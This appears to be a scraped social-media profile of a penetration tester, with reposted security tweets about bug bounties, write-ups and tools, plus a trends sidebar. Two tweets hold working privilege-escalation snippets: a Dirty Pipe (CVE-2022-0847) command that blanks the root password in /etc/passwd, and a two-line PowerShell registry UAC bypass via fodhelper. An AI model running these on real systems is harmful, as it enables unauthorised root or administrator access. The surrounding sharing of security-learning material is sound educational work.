Ghost_fh
@faridpy
OSCP | OSWE | Synack Red Team Member | Security Researcher | Core Pentester at Cobalt.
You might like
Any good resource(s) in JavaScript language. The point about vulnerability finding is to learn the code behind it. To understand SQL injection for example, you need to understand SQL. XSS is in fact JavaScript Injection so you must improve your JavaScript skills.
Hacked up a quick Dirty Pipe PoC that spawns a shell by hijacking (and restoring) the contents of a setuid binary. haxx.in/files/dirtypip…
Clear out the root password using CVE-2022-0847 - dirtypipe.cm4all.com ./CVE-2022-0847 /etc/passwd 1 ootz:
Microsoft Exchange Server SSRF Exploit. vanshal.medium.com/pre-auth-ssrf-… #bugbounty #infosec
Boom. Easy uXSS in any version of Firefox💥 Tools needed - Firefox, Bash and a working mind🌚 #bugbountytips #bugbounty
Looking to learn more about getting started with Android application security? Don’t forget to check out @avanish46’s in-depth introductory guide: bit.ly/3wvXbec
We are excited to announce that Cobalt is now SOC 2 Type II certified! Learn more about SOC 2 compliance and what this means for Cobalt customers in this post by our InfoSec Manager, Alex Jones. cobalt.io/blog/announcin…
If you want to get started with android application security, I have summarised all the resources in one place and blogged about it. Do give it a read and I hope you find it useful. Thanks @cobalt_io for giving me this opportunity ✌️ #android #security blog.cobalt.io/getting-starte…
We don't have to introduce you to @sqlmap by @stamparm: it's the go-to tool for detecting and exploiting SQL injection vulnerabilities. But did you know you can also use CSRF tokens and multi-threading? Check out our quick guide! 👇 blog.intigriti.com/2021/05/23/hac…
A writeup about my latest finding SSRF in PDF Renderer using SVG #ssrf #svg #bugbountytips #bugbounty pwn.vg/articles/2021-…
What goes into an effective #pentest report? For the first installment of a two-part blog series, we’ll dive into the details of vulnerability reports. Breaking down each report section, sharing examples, and tips on how to enhance your report writing: bit.ly/3oBMKm8
cobalt.io
How to Write an Effective Pentest Report | Cobalt
In a two-part blog series, we will focus on various aspects and components of writing an effective report from a pentester’s point of view.
All About Bug Bounty:- Updated. All about bug websites (bypasses, payloads, and etc) github.com/daffainfo/AllA…
Learn about the CSP security header, something that confused me for a long time 😅 blog.shiftleft.io/intro-to-the-c…
Challenge: Is this code secure? 🤔Submit your answer here by April 25th! go.shiftleft.io/developer-chal…
My small research about attacks on remote debuggers of various languages acunetix.com/blog/web-secur… #bugbountytips #Pentesting
Don't miss this expert panel of speakers, including our own @CarolineWMWong, later today! See below for details.
Tomorrow 4/22 join @wisporg & Forte Group on transitioning to privacy & security executive leadership positions. Stellar panelists include @CarolineWMWong, Kristie Chon & @lakshmihanspal. Moderated by @AlyaGennaro. RSVP here: eventbrite.com/e/a-series-tra…
[TOOL RELEASE] - 𝗦𝗶𝗺𝗽𝗹𝗲𝗛𝗧𝗧𝗣𝗦𝗲𝗿𝘃𝗲𝗿 - Go alternative of python SimpleHTTPServer ✅ TCP server with customizable response ✅ File server with an arbitrary directory ✅ File upload support ✅ HTTPS support ✅ Basic auth support github.com/projectdiscove… #opensource
UAC bypass in 2 lines: ``` New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value cmd.exe -Force New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force ``` cmd -> fodhelper PoC||GTFO
Hackers, we have launched a brand new CTF level on #Hacker101 to put your AWS hacking skills to test! The flag from this level is worth 26 points and will get you an invite to one of the private programs hosted on @Hacker0x01! ctf.hacker101.com
United States Trends
- 1. #Worlds2025 58.9K posts
- 2. Doran 27.1K posts
- 3. #T1WIN 33.3K posts
- 4. Faker 39.9K posts
- 5. Good Sunday 52.5K posts
- 6. Silver Scrapes 4,075 posts
- 7. #T1fighting 3,746 posts
- 8. #sundayvibes 3,748 posts
- 9. Blockchain 196K posts
- 10. O God 7,496 posts
- 11. Keria 13.1K posts
- 12. Faye 49.7K posts
- 13. Option 2 4,490 posts
- 14. Vergil 9,012 posts
- 15. Sam Houston 1,639 posts
- 16. John Denver N/A
- 17. Boots 29.8K posts
- 18. Oregon State 4,557 posts
- 19. OutKast 23.7K posts
- 20. The 50 287K posts
Something went wrong.
Something went wrong.